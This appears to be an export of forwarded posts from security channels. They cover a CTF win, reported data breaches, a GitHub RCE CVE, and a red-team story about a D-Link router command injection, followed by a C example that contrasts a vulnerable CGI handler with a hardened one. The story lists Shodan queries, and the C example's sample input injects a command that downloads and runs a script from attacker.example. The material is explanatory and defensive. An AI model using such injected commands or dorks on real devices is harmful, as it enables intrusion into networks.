Forwarded from JavaSec
1st place at the international AITU CTF in Kazakhstan 🇰🇿
Team1337 took 1st place at the two-day CTF!
Teams from a range of countries came to the competition; well-known names such as HackerLab🇷🇺, Kheshig🇲🇳, BunkyoWesterns🇯🇵 and Mimicats🇰🇿 showed themselves well. Holding your own against teams this strong is not easy.
The cyber polygon was very interesting and well built: everything is interconnected, and overlooking one small detail can leave you "stuck" for hours...
Our results:
First bloods taken by Team1337:
1. SCADA: HOSPITAL
2. Ransomware attack on backup server
3. Leak of confidential data: healthcare service
4. Leak of confidential data: secret company contracts
No team managed to get as far as the SCADA systems and shut them down. Only Team1337 pulled it off.
🇺🇿 We were not the only ones from Uzbekistan.
The Zee team also showed themselves very well on the first day, climbing to 2nd place and holding it for quite a while; they solved the hardware task too, but by the end of the CTF had slipped to 11th place. No matter: for a team taking part for the first time I think this is a great result and good experience.
Congratulations to Muhammad (mvhhd) from the Zee team on a successful 2nd place in GeoGuessr.
Special thanks to TuranSecurity for the support, and thanks to everyone for always working as one team☠️
ShinyHunters continues to leak data from data owners who have not paid. Next target: Vimeo...
Example: 1.4 GB of Udemy data breached
#DataLeak #Shinyhunters
Forwarded from Brut Security
🔥 GitHub RCE via a single git push!
CVE-2026-3854: Unsanitized push options let attackers run commands on backend servers, bypassing sandboxing (cross-tenant risk).
🔗 Learn how header injection led to full compromise → https://thehackernews.com/2026/04/researchers-discover-critical-github.html?m=1
Forwarded from Brut Security (media post; the media itself is not included in this export)
Read “International AITU CTF on Kazakhstan SCADA system PWNED🇰🇿“ by JavaSec.uz on Medium: https://medium.com/@abduxalilovjavohir393/international-aitu-ctf-on-kazakhstan-scada-system-pwned-d9b4655a66f3
Alleged data breach involving Zoodmall.com 🌍
~816K+ user records across multiple countries reportedly exposed
Breakdown:
• Iraq: ~371K
• Uzbekistan: ~252K
• Lebanon: ~193K
Data may include:
• Full names
• Phone numbers ⚠️
• Country, city & ZIP details
• Addresses
• Payment & transaction data
• Product details (SKU, price, quantity)
⚠️ Why this matters:
→ Targeted scams using order & transaction data
→ Identity theft & location-based risks
→ Financial fraud possibilities
→ Cross-border exposure increases impact
#DataBreach #CyberSecurity #DataLeak #Privacy #Infosec #ThreatIntel
Forwarded from Sploitus Agency
🔴 A small Red Team real case: how does a single router bring down an entire organization?
Many people still think:
"Even if a router has a small problem, no great harm can come of it..."
But in real situations this view is very wrong.
---
🧠 A short foundation:
The main vulnerabilities found in routers:
• RCE (auth / unauth)
• Authentication bypass
• Command injection
• Default credentials
• Old firmware
And finding them is not hard either.
Through Shodan:
• Routers exposed to the internet
• Model and firmware
• Login panels
all of it is plainly visible.
---
😤 The real case begins:
The attacker tests the organization:
• Web app → protected
• Servers → patched
• AD → relay does not work
• Endpoint → has EDR
👉 Even after several days of attempts, nothing was found.
---
🔍 The turning point:
The attacker looks from the outside.
Searches via Shodan:
port:80 "router"
port:8080 "login"
port:8291 "RouterOS"
👉 And finds one thing:
A D-Link router exposed to the internet
---
⚠️ Vulnerability: CVE-2026-0625
This is not an ordinary bug.
👉 It is an unauthenticated RCE
Meaning:
• No login needed
• No session needed
• A single HTTP request is enough
---
💣 Technical details (simplified):
The router has a dnscfg.cgi endpoint. This endpoint:
• Does not check the value the user submits
• Has no input sanitization
The attacker, in turn:
• Sends a specially crafted HTTP request
• Appends a command inside the parameter (using `;`, `&&` and the like)
Result:
👉 The attacker's command runs in the router's shell
---
🔥 Exploit outcome:
The attacker:
• Gets a reverse shell
• Operates at the router OS level
• Gains near-root control
---
🕸 From here the most dangerous stage begins:
A router is not an ordinary device.
It is:
👉 The center of the entire network
The attacker:
• Watches traffic (packet capture)
• Changes DNS (redirect)
• Performs ARP spoofing
• Identifies internal IPs
---
🔐 The most important blow:
👉 NTLM authentications are captured
This means:
• When a user logs in
• The hash passes through the router
• The attacker records it
---
🎭 What happens next?
• Pass-the-Hash attack
• Access to internal services
• Targeted phishing of employees
👉 The attacker is no longer an "outside hacker"
👉 They have become an "internal user"
---
💥 Result:
• Lateral movement
• Servers compromised
• Credential chain reaction
• Full takeover
---
📄 And the scariest part:
The final report says only:
👉 "Exposed D-Link router (CVE-2026-0625)"
---
😐 The reality, though:
This single vulnerability:
• Broke the perimeter
• Opened a path into the internal network
• Bypassed every defense
---
⚠️ What other vulnerabilities can appear in routers?
It is not only RCE.
The following are common as well:
🔓 Authentication bypass
👉 Getting into the admin panel without logging in
💣 Command injection
👉 Running OS commands through diagnostic functions
🧬 CSRF (Cross-Site Request Forgery)
👉 Changing router settings through the user's browser
🌐 DNS hijacking
👉 Redirecting traffic to a fake site
🔑 Default credentials
👉 The simplest, yet the most dangerous mistake
🕳 Backdoor / hidden account
👉 Access left behind by the vendor or by malware
📡 Open management ports
👉 Telnet / SSH / Web exposed to the internet
---
🧩 Conclusion:
Sometimes:
❌ No zero-day is needed
❌ No complex exploit is needed either
👉 One exposed router is enough
---
🔐 Recommendations:
• Close the router off from the internet (access via VPN)
• Always keep firmware updated
• Change default credentials
• Monitor and review logs
• Disable unnecessary services
---
👉 Remember:
"A router is not a small device.
It is the door into the entire network."
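Added example (not code from the original post, and not D-Link's dnscfg.cgi source, which the post does not show): a C model of the pattern the post describes, a CGI handler that pastes an unchecked DNS-server parameter into a shell command so that `;` or `&&` starts a second command, placed next to a hardened handler that accepts only a dotted-quad IPv4 address and writes the configuration without any shell. The parameter name `dns1`, the `resolv.conf` path and the exact shape of the command string are assumptions made for illustration.

```c
/*
 * Added example, not the original post's or D-Link's code.
 * Models the router CGI command-injection pattern the post describes
 * (unchecked DNS parameter pasted into a shell command) beside a
 * hardened handler. Parameter name, path and command shape are assumed.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>

/* Vulnerable pattern: the DNS server string from the request goes straight
 * into a shell command line. The value is unquoted, so a ';' or '&&' in it
 * ends the echo command and starts a second one. The string is returned
 * rather than executed so the reader can see what system() would receive. */
char *build_dns_cmd_unsafe(const char *dns1) {
    size_t n = strlen(dns1) + 64;
    char *cmd = malloc(n);
    if (cmd == NULL) return NULL;
    snprintf(cmd, n, "echo nameserver %s > /etc/resolv.conf", dns1);
    return cmd;
}

/* Hardened check: allow-list a dotted-quad IPv4 address and nothing else.
 * inet_pton rejects metacharacters, whitespace, hostnames and empty input,
 * so no attempt at stripping individual characters is needed. */
int is_valid_ipv4(const char *s) {
    struct in_addr addr;
    if (s == NULL || strlen(s) > 15) return 0;   /* "255.255.255.255" is 15 */
    return inet_pton(AF_INET, s, &addr) == 1;
}

/* Hardened handler: validate, then write the file with stdio. No shell is
 * involved, so there is nothing for an injected command to run in.
 * Returns 0 on success, -1 when the input is rejected, -2 on I/O error. */
int set_dns_safe(const char *dns1, const char *path) {
    if (!is_valid_ipv4(dns1)) return -1;
    FILE *f = fopen(path, "w");
    if (f == NULL) return -2;
    int rc = (fprintf(f, "nameserver %s\n", dns1) < 0) ? -2 : 0;
    if (fclose(f) != 0) rc = -2;
    return rc;
}

int main(void) {
    /* Constructed sample input: what an attacker might put in the dns1 field. */
    const char *evil = "8.8.8.8; wget http://attacker.example/x -O /tmp/x; sh /tmp/x";
    char *cmd = build_dns_cmd_unsafe(evil);
    printf("unsafe handler would hand the shell: %s\n", cmd);
    free(cmd);
    printf("safe handler on injected input: %d\n", set_dns_safe(evil, "resolv_test.conf"));
    printf("safe handler on 8.8.8.8: %d\n", set_dns_safe("8.8.8.8", "resolv_test.conf"));
    return 0;
}
```

The unsafe function only builds the command string so the injected tail can be inspected; in firmware that same string would be passed to system() and executed as the router's web process. The hardened version deliberately does not try to strip `;` or `&&`: an allow-list check plus no shell at all removes the bug class, whereas a denylist of metacharacters tends to miss the next separator (a newline, a backtick, `$(...)`).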